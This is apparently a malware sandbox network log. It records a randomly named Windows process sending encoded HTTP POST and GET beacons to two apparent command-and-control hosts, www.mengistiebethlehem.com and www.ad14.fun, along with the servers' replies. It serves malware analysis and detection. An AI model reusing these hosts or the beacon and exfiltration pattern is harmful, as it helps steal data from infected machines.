                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.649727208.91.197.13806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:56:51.064060926 CEST632OUTPOST /92z0/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.mengistiebethlehem.com
                                                      Origin: http://www.mengistiebethlehem.com
                                                      Referer: http://www.mengistiebethlehem.com/92z0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 4c 65 4a 41 30 41 61 6c 79 6c 37 66 7a 6a 68 30 51 6d 2f 39 39 4d 72 45 4a 50 50 7a 71 78 44 4b 30 31 43 64 70 62 77 42 4f 6a 65 6f 58 56 74 76 31 6d 52 76 69 75 63 6d 2f 4e 7a 39 63 65 78 42 31 4f 79 54 54 58 6b 57 4d 53 64 62 39 56 37 41 75 78 49 44 59 4b 6b 2b 37 2f 4c 6b 33 6f 61 6a 63 31 69 2f 34 38 67 32 2b 31 47 53 41 2f 4d 6e 7a 6c 54 44 46 6d 73 76 6a 32 71 4a 4b 73 6d 42 55 47 49 4c 38 76 55 64 47 53 39 55 66 68 32 69 37 39 54 70 45 31 32 34 42 58 65 75 61 57 32 4b 51 78 69 41 54 5a 31 30 2f 44 71 73 6d 32 43 63 6f 75 64 57 52 63 31 71 47 45 37 66 4f 69 6b 43 42 6a 74 78 54 4b 63 73 33 38 52 73
                                                      Data Ascii: OdjTHtuX=LeJA0Aalyl7fzjh0Qm/99MrEJPPzqxDK01CdpbwBOjeoXVtv1mRviucm/Nz9cexB1OyTTXkWMSdb9V7AuxIDYKk+7/Lk3oajc1i/48g2+1GSA/MnzlTDFmsvj2qJKsmBUGIL8vUdGS9Ufh2i79TpE124BXeuaW2KQxiATZ10/Dqsm2CcoudWRc1qGE7fOikCBjtxTKcs38Rs


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.649728208.91.197.13806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:56:53.603334904 CEST656OUTPOST /92z0/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.mengistiebethlehem.com
                                                      Origin: http://www.mengistiebethlehem.com
                                                      Referer: http://www.mengistiebethlehem.com/92z0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 4c 65 4a 41 30 41 61 6c 79 6c 37 66 78 41 70 30 44 52 54 39 31 4d 72 44 46 76 50 7a 67 52 44 4f 30 31 65 64 70 61 6b 76 4f 56 4f 6f 57 30 78 76 6e 58 52 76 6a 75 63 6d 72 64 7a 34 53 2b 77 4e 31 4f 2f 6d 54 53 45 57 4d 57 31 62 39 51 2f 41 76 44 67 45 43 36 6b 34 7a 66 4c 31 70 59 61 6a 63 31 69 2f 34 38 30 63 2b 31 65 53 41 50 38 6e 31 41 2f 4d 4c 47 73 6f 6b 32 71 4a 42 4d 6d 46 55 47 4a 6f 38 75 49 33 47 51 46 55 66 68 47 69 37 73 54 75 4e 31 32 2b 4c 33 65 34 64 69 76 2f 64 42 76 7a 62 37 5a 69 71 30 75 6b 75 67 44 47 30 64 64 31 44 4d 56 6f 47 47 6a 74 4f 43 6b 6f 44 6a 56 78 42 64 51 4c 34 49 30 50 6c 74 48 69 54 6f 2f 4e 62 37 5a 55 56 6a 35 4a 6f 45 57 68 67 67 3d 3d
                                                      Data Ascii: OdjTHtuX=LeJA0Aalyl7fxAp0DRT91MrDFvPzgRDO01edpakvOVOoW0xvnXRvjucmrdz4S+wN1O/mTSEWMW1b9Q/AvDgEC6k4zfL1pYajc1i/480c+1eSAP8n1A/MLGsok2qJBMmFUGJo8uI3GQFUfhGi7sTuN12+L3e4div/dBvzb7Ziq0ukugDG0dd1DMVoGGjtOCkoDjVxBdQL4I0PltHiTo/Nb7ZUVj5JoEWhgg==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.649729208.91.197.13806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:56:56.134558916 CEST1669OUTPOST /92z0/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.mengistiebethlehem.com
                                                      Origin: http://www.mengistiebethlehem.com
                                                      Referer: http://www.mengistiebethlehem.com/92z0/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 4c 65 4a 41 30 41 61 6c 79 6c 37 66 78 41 70 30 44 52 54 39 31 4d 72 44 46 76 50 7a 67 52 44 4f 30 31 65 64 70 61 6b 76 4f 56 47 6f 57 47 56 76 31 45 70 76 78 2b 63 6d 33 74 7a 35 53 2b 77 45 31 4f 33 71 54 53 41 67 4d 51 78 62 2b 32 44 41 37 6e 30 45 4d 4b 6b 34 78 66 4b 79 33 6f 62 33 63 31 53 37 34 2f 4d 63 2b 31 65 53 41 4d 6b 6e 69 46 54 4d 47 6d 73 76 6a 32 72 49 4b 73 6d 39 55 46 34 54 38 75 4d 4e 48 6a 4e 55 47 46 69 69 38 65 37 75 52 6c 32 38 4d 33 66 37 64 6e 33 57 64 42 79 41 62 37 42 49 71 7a 6d 6b 2b 6b 50 62 6f 76 5a 76 58 75 4d 49 65 33 44 63 4b 30 55 34 44 6c 4a 4f 4a 2f 41 76 31 4c 77 7a 75 39 66 48 54 6f 71 33 4f 36 52 49 61 6a 41 6f 68 77 53 72 2b 56 45 66 6c 79 36 44 53 46 2b 6e 70 42 53 45 4c 30 72 63 69 62 41 7a 41 76 64 41 45 2b 4d 49 39 58 4f 2b 4c 47 37 2b 58 4d 58 6b 50 78 37 68 68 71 76 69 67 33 45 2b 2b 37 34 79 30 6a 65 7a 62 46 31 6c 79 51 4d 4e 46 51 6a 5a 59 50 67 51 41 33 32 4a 4f 64 66 36 42 52 38 41 51 58 2f 53 75 6f 6f 64 53 39 6b 6e 68 [TRUNCATED]
                                                      Data Ascii: OdjTHtuX=LeJA0Aalyl7fxAp0DRT91MrDFvPzgRDO01edpakvOVGoWGVv1Epvx+cm3tz5S+wE1O3qTSAgMQxb+2DA7n0EMKk4xfKy3ob3c1S74/Mc+1eSAMkniFTMGmsvj2rIKsm9UF4T8uMNHjNUGFii8e7uRl28M3f7dn3WdByAb7BIqzmk+kPbovZvXuMIe3DcK0U4DlJOJ/Av1Lwzu9fHToq3O6RIajAohwSr+VEfly6DSF+npBSEL0rcibAzAvdAE+MI9XO+LG7+XMXkPx7hhqvig3E++74y0jezbF1lyQMNFQjZYPgQA32JOdf6BR8AQX/SuoodS9knhLn604lxTvPpJu48Ztq/89YyBGLGonDUd/Z/dL2mn+wERBcQ8VB0b8LUUp3SqiRXQrNxzjStBejpW7Jn19YJJc08Ouvcp6iYcodht2F2i4Ed6FqL7r0g8Rb7yuVGrtyWjgdEe/d+Yo2BZ4zZ1f0nl3+Pap0gHieXw96vG/f9sQT+sEf7ahHqxHew9A1YMXaQ5+OFAb7pxlMbIKvR51RGjAXbi4Xmg6AIetdMNgR1SS001JWFZlzppdqG7FVZIMiPkWePVPuF/HzbRgD5mZM6y4l78Moyh05WN7qedfJKxMdnSO8v+pI8cNWlrP8RTaq6Uy0W/3uxJ7d4mPzGttcQKqWMkrEfb4+FZpTl9i7WXzuRC+ZfuE8Ja5PyBc9k+dQFlcePFSvaV8jYUbDtc2/jjTmKfBnQV69g7YfBpeiNMNBzK+v4yKC3hRhQ0viw32kXwd9o5pzl459QGtAjHXcQ3LkXLQ/1tSWBCnTX0oE/cx/xWaufRrw9QjT+yKoRhlvYK90UPuZReVrlQfyqZaKf0jJs5WV8oZo6gkAbd7lOb7SMhPqH602T2DxbzPY1d6R9EZEFJuUWqxIJ1VYOaYdHbu3hYrM97loJt9o6cuirlU0WkrD+vD+T/Udg0hlzK2qukty5pNjC5y8QmNxCTvW6JCUzA7lgXyc4Eox [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.649730208.91.197.13806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:56:58.668369055 CEST355OUTGET /92z0/?OdjTHtuX=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Y6vp=3PLd8j HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.mengistiebethlehem.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:56:59.619030952 CEST1236INHTTP/1.1 200 OK
                                                      Date: Wed, 03 Jul 2024 15:56:49 GMT
                                                      Server: Apache
                                                      Set-Cookie: vsid=925vr467567809662474819; expires=Mon, 02-Jul-2029 15:56:49 GMT; Max-Age=157680000; path=/; domain=www.mengistiebethlehem.com; HttpOnly
                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_EVkxnguzMv9Akqf/ch/CimlLaYBOfPYIJ1fRy0Es9A/5+vR5iOrIm1eOstGxJwvgY3jSXwVkbrZBkV8ac+TJ9w==
                                                      Transfer-Encoding: chunked
                                                      Content-Type: text/html; charset=UTF-8
                                                      Connection: close
                                                      Data Raw: 38 66 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                      Data Ascii: 8f53<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cd
                                                      Jul 3, 2024 17:56:59.619214058 CEST1236INData Raw: 6e 3d 22 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 7d 69 66 28 21 28 22 63 6d 70 5f 70 72 6f 74 6f 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 70 72 6f 74 6f 3d 22 68 74 74 70 73 3a 22 7d
                                                      Data Ascii: n="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET",
                                                      Jul 3, 2024 17:56:59.619229078 CEST1236INData Raw: 70 65 72 43 61 73 65 28 29 29 7d 65 6c 73 65 7b 69 66 28 22 63 6d 70 5f 73 65 74 6c 61 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 6c 61 6e 67 21 3d 22 22 29 7b 63 2e 70 75 73 68 28 77 69 6e 64 6f 77 2e
                                                      Data Ascii: perCase())}else{if("cmp_setlang" in window&&window.cmp_setlang!=""){c.push(window.cmp_setlang.toUpperCase())}else{if(a.length>0){for(var d=0;d<a.length;d++){c.push(a[d])}}}}}if("language" in navigator){c.push(navigator.language)}if("userLangua
                                                      Jul 3, 2024 17:56:59.619788885 CEST1236INData Raw: 20 68 29 3f 68 2e 63 6d 70 5f 70 72 6f 74 6f 3a 22 68 74 74 70 73 3a 22 3b 69 66 28 6b 21 3d 22 68 74 74 70 3a 22 26 26 6b 21 3d 22 68 74 74 70 73 3a 22 29 7b 6b 3d 22 68 74 74 70 73 3a 22 7d 76 61 72 20 67 3d 28 22 63 6d 70 5f 72 65 66 22 20 69
                                                      Data Ascii: h)?h.cmp_proto:"https:";if(k!="http:"&&k!="https:"){k="https:"}var g=("cmp_ref" in h)?h.cmp_ref:location.href;var j=u.createElement("script");j.setAttribute("data-cmp-ab","1");var c=x("cmpdesign","cmp_design" in h?h.cmp_design:"");var f=x("cm
                                                      Jul 3, 2024 17:56:59.619805098 CEST859INData Raw: 7b 74 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 7d 7d 76 61 72 20 6d 3d 22 6a 73 22 3b 76 61 72 20 70 3d 78 28 22 63 6d 70 64 65 62 75 67 75 6e 6d 69 6e 69 6d 69 7a 65 64 22 2c 22 63 6d 70 64 65 62 75 67 75 6e 6d 69 6e 69 6d 69 7a
                                                      Data Ascii: {t[0].appendChild(j)}}}var m="js";var p=x("cmpdebugunminimized","cmpdebugunminimized" in h?h.cmpdebugunminimized:0)>0?"":".min";var a=x("cmpdebugcoverage","cmp_debugcoverage" in h?h.cmp_debugcoverage:"");if(a=="1"){m="instrumented";p=""}var j=
                                                      Jul 3, 2024 17:56:59.619818926 CEST1236INData Raw: 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3b 69 66 28 22 63 6d 70 5f 63 64 6e 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 22 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f
                                                      Data Ascii: ="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","n
                                                      Jul 3, 2024 17:56:59.619828939 CEST224INData Raw: 6d 70 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3d 3d 34 26 26 61 5b 33 5d 3d 3d 3d 66 61 6c 73 65 29 7b 61 5b 32 5d 28 7b 7d 2c 66 61 6c 73 65 29 7d 65 6c 73
                                                      Data Ascii: mp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden",sup
                                                      Jul 3, 2024 17:56:59.620735884 CEST1236INData Raw: 70 6f 72 74 65 64 41 50 49 73 3a 5b 22 74 63 66 63 61 22 2c 22 75 73 6e 61 74 22 2c 22 75 73 63 61 22 2c 22 75 73 76 61 22 2c 22 75 73 63 6f 22 2c 22 75 73 75 74 22 2c 22 75 73 63 74 22 5d 2c 63 6d 70 49 64 3a 33 31 7d 7d 3b 77 69 6e 64 6f 77 2e
                                                      Data Ascii: portedAPIs:["tcfca","usnat","usca","usva","usco","usut","usct"],cmpId:31}};window.cmp_gppstub=function(){var a=arguments;__gpp.q=__gpp.q||[];if(!a.length){return __gpp.q}var g=a[0];var f=a.length>1?a[1]:null;var e=a.length>2?a[2]:null;if(g==="
                                                      Jul 3, 2024 17:56:59.620752096 CEST1236INData Raw: 6d 70 28 62 2e 63 6f 6d 6d 61 6e 64 2c 62 2e 70 61 72 61 6d 65 74 65 72 2c 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 76 61 72 20 65 3d 7b 5f 5f 63 6d 70 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67
                                                      Data Ascii: mp(b.command,b.parameter,function(h,g){var e={__cmpReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")})}if(typeof(c)==="object"&&c!==null&&"__uspapiCall" in c){var b=c.__uspapiCall;window.__uspapi
                                                      Jul 3, 2024 17:56:59.620763063 CEST448INData Raw: 77 2e 63 6d 70 5f 73 65 74 47 70 70 53 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 28 61 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74
                                                      Data Ascii: w.cmp_setGppStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_gppstub;window[a].msgHandler=window.cmp_msghandler;window
                                                      Jul 3, 2024 17:56:59.624519110 CEST1236INData Raw: 61 62 6c 65 74 63 66 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 74 63 66 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 74 63 66 61 70 69 4c 6f 63 61 74 6f 72 22
                                                      Data Ascii: abletcf" in window)||!window.cmp_disabletcf){window.cmp_addFrame("__tcfapiLocator")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_setStub("__cmp");if(!("cmp_disabletcf" in window)||!wi


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.649732188.114.96.3806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:57:04.778712034 CEST590OUTPOST /oc7s/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.ad14.fun
                                                      Origin: http://www.ad14.fun
                                                      Referer: http://www.ad14.fun/oc7s/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 46 52 62 55 33 72 74 4e 33 6c 33 71 63 43 33 51 64 78 69 6e 41 49 6a 44 77 39 58 54 66 41 67 5a 6b 33 42 75 70 78 78 4a 4d 2f 69 50 65 41 4c 6b 65 44 62 4e 56 4e 37 56 67 54 57 4b 65 39 66 48 6e 51 5a 51 7a 46 30 65 4c 33 6f 55 46 68 63 79 76 55 57 61 41 4f 47 4a 32 67 48 7a 39 33 4d 55 51 4c 4e 70 6f 51 34 7a 75 42 59 59 76 66 4b 6c 62 61 48 64 55 4b 79 6c 6f 65 61 74 39 7a 75 6a 68 6f 4a 6f 75 4e 64 44 76 6d 32 61 62 53 4d 63 6d 56 42 65 73 76 52 66 78 33 63 58 76 6b 6c 32 39 6a 35 4a 5a 6b 78 71 6c 64 32 4a 49 75 56 54 38 44 38 43 78 72 67 71 46 46 57 37 46 44 35 57 6f 76 53 73 35 32 77 68 4b 63 57 6e
                                                      Data Ascii: OdjTHtuX=FRbU3rtN3l3qcC3QdxinAIjDw9XTfAgZk3BupxxJM/iPeALkeDbNVN7VgTWKe9fHnQZQzF0eL3oUFhcyvUWaAOGJ2gHz93MUQLNpoQ4zuBYYvfKlbaHdUKyloeat9zujhoJouNdDvm2abSMcmVBesvRfx3cXvkl29j5JZkxqld2JIuVT8D8CxrgqFFW7FD5WovSs52whKcWn
                                                      Jul 3, 2024 17:57:05.459671974 CEST1236INHTTP/1.1 200 OK
                                                      Date: Wed, 03 Jul 2024 15:57:05 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GEyrw%2FrktxeN6EX%2Bz0MFvIUUNFHTM0627Zo66kDJJ06MZoxGbxTchE%2BYxEwYs5uJMuUlegADxHODKBxE4RWFfDcqCmDImMv4wdV0fUc3NqjH%2BHqaYjTc0LIT0tfJH4M%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 89d811bb7e810f9b-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 33 32 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 56 cf 53 d3 40 14 fe 57 e2 ce 38 c0 b4 12 f5 20 8e a6 f1 a0 8e 47 3d 78 f1 94 89 e9 42 2b 6d d3 49 16 18 6e a9 5a 68 e9 2f aa ed 40 01 15 1d c0 8a d2 52 ab 96 b6 a4 fc 33 d9 dd e4 e4 bf e0 c4 cd 38 29 a8 b7 5c 92 d9 b7 5f de fb de f7 de be 8d 70 e9 de c3 bb 8f 9f 3c ba cf c5 50 32 21 0a ee 93 4b c8 a9 b9 08 80 29 20 0a 31 28 47 45 21 09 91 cc 29 31 59 d3 21 8a 00 b4 30 7b e5 26 e0 45 01 c5 51 02 8a 93 31 59 bd 31 bd 18 4f 4f d9 c7 3d 72 54 9c 53 d5 b9 04 b4 bf 1d e0 4a cf fe 76 64 f5 8f 7f 9e 16 49 b9 49 f3 7d b4 14 47 50 3b b7 15 8d eb 8a aa 45 fd 56 09 1f 57 68 a7 eb 18 06 5e 1d f8 fd 49 fe 05 31 ca 56 3f 47 36 47 74 6f e0 d4 1a 76 bb 2d 31 06 7e 57 d7 71 f6 05 03 3a 86 41 be 8c 68 ad 6b b7 7b 52 00 a4 05 9e e9 c1 d4 4a c9 49 18 01 f3 70 79 49 d5 a2 3a e0 14 35 85 60 0a 45 40 00 91 99 0b 52 59 a7 7b 03 66 c7 ed 15 ba 9b 21 9b 6d 6b 68 58 fd 5c 98 e4 0b 64 67 4c 49 b2 b1 4b ba 75 fb ec 2d 29 ef 5b 83 57 76 a6 46 cd 6a d8 8f e0 d8 47 2e b6 db c4 2b c5 [TRUNCATED]
                                                      Data Ascii: 32bVS@W8 G=xB+mInZh/@R38)\_p<P2!K) 1(GE!)1Y!0{&EQ1Y1OO=rTSJvdII}GP;EVWh^I1V?G6Gtov-1~Wq:Ahk{RJIpyI:5`E@RY{f!mkhX\dgLIKu-)[WvFjG.+05:p-RAV%[/qpgK~7^9MfA/Rof:)1{#Xn%uEQ\M[[p+Kqmi7$uAK'zGxXxZUKO;tnccxE[#t%gcsz|ICly'M%;%|2tXYD?qqeVVSUwOqh3X=lM
                                                      Jul 3, 2024 17:57:05.459770918 CEST220INData Raw: 09 67 4b 7e 1c 3b 61 72 3a cd 8c 9c e7 af 35 a2 66 0b 67 76 c8 d1 07 e9 62 9f 53 b3 4a 3f 37 70 6b 93 9a 55 d6 5b 41 a7 63 37 b6 48 e1 1d ae f4 e8 6e c6 6b 3a 2e 9d 58 d0 cf 4d 97 80 98 b8 13 86 0d 15 71 51 d6 38 5d e7 22 40 98 d5 e4 24 08 01 a8
                                                      Data Ascii: gK~;ar:5fgvbSJ?7pkU[Ac7Hnk:.XMqQ8]"@$C)jBL\!pk D~c:r{v;}Dp.IUI!\q'u-cgS5,Ga$+!0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.649733188.114.96.3806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:57:07.320935965 CEST614OUTPOST /oc7s/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.ad14.fun
                                                      Origin: http://www.ad14.fun
                                                      Referer: http://www.ad14.fun/oc7s/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 46 52 62 55 33 72 74 4e 33 6c 33 71 47 69 6e 51 4f 53 4b 6e 51 59 6a 4d 31 39 58 54 56 67 68 51 6b 33 46 75 70 77 45 53 4e 4a 61 50 66 6c 33 6b 66 43 62 4e 63 64 37 56 72 7a 57 4c 61 39 66 63 6e 51 45 6c 7a 48 67 65 4c 33 38 55 46 68 73 79 76 48 4f 5a 41 65 47 4c 6a 51 48 78 7a 58 4d 55 51 4c 4e 70 6f 51 38 5a 75 46 30 59 73 75 36 6c 63 4c 48 61 4b 61 79 6d 67 2b 61 74 35 7a 75 6e 68 6f 49 39 75 4d 51 65 76 6c 4f 61 62 58 49 63 6e 41 39 66 6c 76 52 6a 2f 58 64 38 72 6d 4d 6e 34 54 45 77 61 69 6c 30 36 4e 57 70 41 34 55 4a 67 77 38 68 6a 37 41 6f 46 48 4f 4a 46 6a 35 38 71 76 71 73 72 68 38 47 46 6f 7a 45 42 32 74 65 32 61 31 64 4a 45 6e 67 34 6d 75 36 37 56 54 67 39 51 3d 3d
                                                      Data Ascii: OdjTHtuX=FRbU3rtN3l3qGinQOSKnQYjM19XTVghQk3FupwESNJaPfl3kfCbNcd7VrzWLa9fcnQElzHgeL38UFhsyvHOZAeGLjQHxzXMUQLNpoQ8ZuF0Ysu6lcLHaKaymg+at5zunhoI9uMQevlOabXIcnA9flvRj/Xd8rmMn4TEwail06NWpA4UJgw8hj7AoFHOJFj58qvqsrh8GFozEB2te2a1dJEng4mu67VTg9Q==
                                                      Jul 3, 2024 17:57:08.029764891 CEST1236INHTTP/1.1 200 OK
                                                      Date: Wed, 03 Jul 2024 15:57:07 GMT
                                                      Content-Type: text/html;charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
